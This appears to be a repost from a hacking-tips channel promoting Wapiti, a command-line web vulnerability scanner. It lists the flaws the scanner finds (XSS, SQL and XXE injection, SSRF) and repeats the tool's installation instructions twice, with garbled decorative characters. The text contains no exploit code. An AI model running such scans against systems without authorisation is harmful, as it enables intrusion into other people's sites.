> clone https://github.com/IFGHou/wapiti
> go dir
> run :
Installation on Unix-like systems
=================================
If you really want to install Wapiti on your system, launch the setup.py script with the following command :
python setup.py install
It will copy the wapiti libraries (wapitiCore) in your Python installation and place the executables in a "bin" system
directory (eg: /usr/local/bin).
Using Wapiti on Windows systems
===============================
If you don't want to install all the requirements to use Wapiti on Windows you should look for a standalone package
made with py2exe (see the available downloads on SourceForge).
Then, just download and extract the zip archive and launch wapiti.exe from the Windows command line.
Installing Wapiti requirements on Windows
=========================================
You can't install Wapiti on a Windows system but if (for some reasons) you really want to install all the
requirements then :
* Download a Python 2.7.5 (or more recent) installer for your platform from http://python.org/download/
* Install it and change the PATH environment variable to append the Python path
* Download a requests archive from http://docs.python-requests.org/en/latest/user/install/
* Extract the archive and call the setup.py script from the archive with "python setup.py install"
* Download BeautifulSoup 3 from http://www.crummy.com/software/BeautifulSoup/
* Extract the archive and call the setup.py script from the archive with "python setup.py install"
E N J O Y
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦hack like expert -Wapiti is a free open-source command-line based vulnerability scanner written in Python. While itβs not the most popular tool in this field, it does a good job of finding security flaws in many web applications.
t.me/undercodeTesting
π¦Using Wapiti can help you to discover security holes including:
F E A T U R E S :
XSS attacks
SQL injections
XPath injections
XXE injections
CRLF injections
Server side request forgery
Other features include:
Runs in verbose mode
Ability to pause and resume scans.
Highlights vulnerabilities found inside the terminal
Generates reports and export into HTML, XML, JSON and TXT
Activates and deactivates multiple attack modules
Removes parameters from certain URLs
Excludes URLs during an attack
Bypasses SSL certificate verification
URL extractor from javascript
Timeout configuration for large scans
Sets custom user-agent and HTTP headers
π¦πβπππΈπππππΈπππβ & βπβ :
> clone https://github.com/IFGHou/wapiti
> go dir
> run :
Installation on Unix-like systems
=================================
If you really want to install Wapiti on your system, launch the setup.py script with the following command :
python setup.py install
It will copy the wapiti libraries (wapitiCore) in your Python installation and place the executables in a "bin" system
directory (eg: /usr/local/bin).
Using Wapiti on Windows systems
===============================
If you don't want to install all the requirements to use Wapiti on Windows you should look for a standalone package
made with py2exe (see the available downloads on SourceForge).
Then, just download and extract the zip archive and launch wapiti.exe from the Windows command line.
Installing Wapiti requirements on Windows
=========================================
You can't install Wapiti on a Windows system but if (for some reasons) you really want to install all the
requirements then :
* Download a Python 2.7.5 (or more recent) installer for your platform from http://python.org/download/
* Install it and change the PATH environment variable to append the Python path
* Download a requests archive from http://docs.python-requests.org/en/latest/user/install/
* Extract the archive and call the setup.py script from the archive with "python setup.py install"
* Download BeautifulSoup 3 from http://www.crummy.com/software/BeautifulSoup/
* Extract the archive and call the setup.py script from the archive with "python setup.py install"
E N J O Y
β β β ο½ππ»βΊπ«Δπ¬πβ β β β